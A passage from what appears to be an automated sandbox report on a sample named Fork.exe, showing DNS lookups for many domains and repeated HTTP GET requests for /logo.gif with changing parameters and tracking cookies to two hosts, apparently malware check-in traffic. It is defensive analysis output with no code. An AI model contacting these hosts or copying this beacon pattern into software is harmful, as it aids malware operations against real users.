                                                                        Mar 16, 2025 23:04:47.314482927 CET53493351.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:48.466330051 CET5724753192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:48.476771116 CET53572471.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:48.984642982 CET6212953192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:49.001082897 CET53621291.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:49.761337042 CET6498553192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:49.768296003 CET53649851.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:50.200553894 CET5521553192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:50.416800976 CET53552151.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:50.576114893 CET5468153192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:50.630629063 CET53546811.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:53.202061892 CET4925353192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:53.624422073 CET53492531.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:53.676687002 CET5981553192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:53.687273979 CET53598151.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:53.849256039 CET5547853192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:53.874252081 CET53554781.1.1.1192.168.2.9

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Mar 16, 2025 23:04:28.427220106 CET192.168.2.91.1.1.10x3020Standard query (0)businecessity.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:29.267972946 CET192.168.2.91.1.1.10xe16aStandard query (0)al-somow.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:29.662575960 CET192.168.2.91.1.1.10x99b0Standard query (0)amnisure.com.trA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:29.744261980 CET192.168.2.91.1.1.10x8f47Standard query (0)bhagavatirannade.orgA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:30.670660019 CET192.168.2.91.1.1.10x31cfStandard query (0)ankara-cambalkon.netA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.168420076 CET192.168.2.91.1.1.10x9310Standard query (0)aocuoikhanhlinh.vnA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.346298933 CET192.168.2.91.1.1.10xb771Standard query (0)yeni.antalyahilal.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.365132093 CET192.168.2.91.1.1.10xf883Standard query (0)arimaexim.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:34.938630104 CET192.168.2.91.1.1.10x2334Standard query (0)businecessity.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:35.376758099 CET192.168.2.91.1.1.10xec53Standard query (0)al-somow.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:35.747778893 CET192.168.2.91.1.1.10xe21Standard query (0)amnisure.com.trA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:36.754764080 CET192.168.2.91.1.1.10xd116Standard query (0)ankara-cambalkon.netA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:37.166395903 CET192.168.2.91.1.1.10x7b8aStandard query (0)aocuoikhanhlinh.vnA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:37.409833908 CET192.168.2.91.1.1.10x57bbStandard query (0)yeni.antalyahilal.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:40.962907076 CET192.168.2.91.1.1.10xd5e3Standard query (0)businecessity.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:41.616554976 CET192.168.2.91.1.1.10x71f4Standard query (0)al-somow.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:41.840270042 CET192.168.2.91.1.1.10xa228Standard query (0)amnisure.com.trA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:42.776067019 CET192.168.2.91.1.1.10x8c09Standard query (0)ankara-cambalkon.netA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:42.867494106 CET192.168.2.91.1.1.10x8651Standard query (0)aocuoikhanhlinh.vnA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:42.937671900 CET192.168.2.91.1.1.10x94dbStandard query (0)yeni.antalyahilal.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:45.610960007 CET192.168.2.91.1.1.10x7058Standard query (0)businecessity.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.300482988 CET192.168.2.91.1.1.10x463cStandard query (0)yeni.antalyahilal.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:48.466330051 CET192.168.2.91.1.1.10x4d73Standard query (0)al-somow.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:48.984642982 CET192.168.2.91.1.1.10x7992Standard query (0)amnisure.com.trA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:49.761337042 CET192.168.2.91.1.1.10xd766Standard query (0)c.pki.googA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:50.200553894 CET192.168.2.91.1.1.10x42abStandard query (0)ankara-cambalkon.netA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:50.576114893 CET192.168.2.91.1.1.10xd6acStandard query (0)aocuoikhanhlinh.vnA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:53.202061892 CET192.168.2.91.1.1.10x55a1Standard query (0)businecessity.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:53.676687002 CET192.168.2.91.1.1.10x7ebbStandard query (0)al-somow.comA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:53.849256039 CET192.168.2.91.1.1.10x816fStandard query (0)amnisure.com.trA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Mar 16, 2025 23:04:28.848244905 CET1.1.1.1192.168.2.90x3020Server failure (2)businecessity.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:29.519452095 CET1.1.1.1192.168.2.90xe16aName error (3)al-somow.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:29.678014994 CET1.1.1.1192.168.2.90x99b0Name error (3)amnisure.com.trnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:29.938927889 CET1.1.1.1192.168.2.90x8f47No error (0)bhagavatirannade.org3.229.117.57A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.091872931 CET1.1.1.1192.168.2.90x31cfServer failure (2)ankara-cambalkon.netnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.184340000 CET1.1.1.1192.168.2.90x9310Name error (3)aocuoikhanhlinh.vnnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.353436947 CET1.1.1.1192.168.2.90xb771Name error (3)yeni.antalyahilal.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:31.549717903 CET1.1.1.1192.168.2.90xf883No error (0)arimaexim.com3.229.117.57A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:34.945987940 CET1.1.1.1192.168.2.90x2334Server failure (2)businecessity.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:35.386795044 CET1.1.1.1192.168.2.90xec53Name error (3)al-somow.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:35.861602068 CET1.1.1.1192.168.2.90xe21Name error (3)amnisure.com.trnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:36.968828917 CET1.1.1.1192.168.2.90xd116Server failure (2)ankara-cambalkon.netnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:37.175748110 CET1.1.1.1192.168.2.90x7b8aName error (3)aocuoikhanhlinh.vnnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:37.441509008 CET1.1.1.1192.168.2.90x57bbName error (3)yeni.antalyahilal.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:41.391596079 CET1.1.1.1192.168.2.90xd5e3Server failure (2)businecessity.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:41.635135889 CET1.1.1.1192.168.2.90x71f4Name error (3)al-somow.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:41.859850883 CET1.1.1.1192.168.2.90xa228Name error (3)amnisure.com.trnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:42.784107924 CET1.1.1.1192.168.2.90x8c09Server failure (2)ankara-cambalkon.netnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:42.920932055 CET1.1.1.1192.168.2.90x8651Name error (3)aocuoikhanhlinh.vnnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:42.951034069 CET1.1.1.1192.168.2.90x94dbName error (3)yeni.antalyahilal.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:45.826522112 CET1.1.1.1192.168.2.90x7058Server failure (2)businecessity.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.314482927 CET1.1.1.1192.168.2.90x463cName error (3)yeni.antalyahilal.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:47.335861921 CET1.1.1.1192.168.2.90x6b74No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:48.476771116 CET1.1.1.1192.168.2.90x4d73Name error (3)al-somow.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:49.001082897 CET1.1.1.1192.168.2.90x7992Name error (3)amnisure.com.trnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:49.768296003 CET1.1.1.1192.168.2.90xd766No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:49.768296003 CET1.1.1.1192.168.2.90xd766No error (0)pki-goog.l.google.com142.250.186.163A (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:50.416800976 CET1.1.1.1192.168.2.90x42abServer failure (2)ankara-cambalkon.netnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:50.630629063 CET1.1.1.1192.168.2.90xd6acName error (3)aocuoikhanhlinh.vnnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:53.624422073 CET1.1.1.1192.168.2.90x55a1Server failure (2)businecessity.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:53.687273979 CET1.1.1.1192.168.2.90x7ebbName error (3)al-somow.comnonenoneA (IP address)IN (0x0001)false
                                                                        Mar 16, 2025 23:04:53.874252081 CET1.1.1.1192.168.2.90x816fName error (3)amnisure.com.trnonenoneA (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • bhagavatirannade.org
                                                                        • arimaexim.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.9496833.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:29.982558012 CET198OUTGET /logo.gif?6b3a03=28108812 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Mar 16, 2025 23:04:30.442202091 CET420INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.9496843.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:31.564620018 CET191OUTGET /logo.gif?79b3d2=31903560 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Mar 16, 2025 23:04:32.049948931 CET413INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:31 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.9496853.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:32.619930029 CET305OUTGET /logo.gif?b2e175=46892500 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:33.069434881 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:33 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.9496863.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:33.792232037 CET299OUTGET /logo.gif?cb4dd6=106589872 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:34.249465942 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:34 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.9496873.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:36.026817083 CET307OUTGET /logo.gif?1113539=107429718 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:36.427499056 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:36 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.9496883.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:37.542903900 CET300OUTGET /logo.gif?1308dd2=179633250 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:38.004046917 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:37 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.9496893.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:39.207050085 CET307OUTGET /logo.gif?175d7eb=196001624 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:39.615609884 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:39 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.9496903.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:39.797686100 CET300OUTGET /logo.gif?18828d2=179903934 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:40.387845993 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:40 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.9496913.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:42.143299103 CET307OUTGET /logo.gif?1e72e91=159639765 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:42.547389030 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:42 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.9496923.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:43.083952904 CET300OUTGET /logo.gif?2063744=237732572 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:43.449911118 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:43 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.9496933.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:43.821810961 CET307OUTGET /logo.gif?263b431=280620375 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:44.221091986 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:44 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.9496943.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:44.751832008 CET300OUTGET /logo.gif?282bcc5=294857059 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:45.214785099 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:45 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.9496963.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:46.397324085 CET307OUTGET /logo.gif?2f2bdaf=494627030 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:46.797034979 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:46 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.9496983.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:47.492856979 CET300OUTGET /logo.gif?3115e42=514698900 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; snkz=8.46.123.189
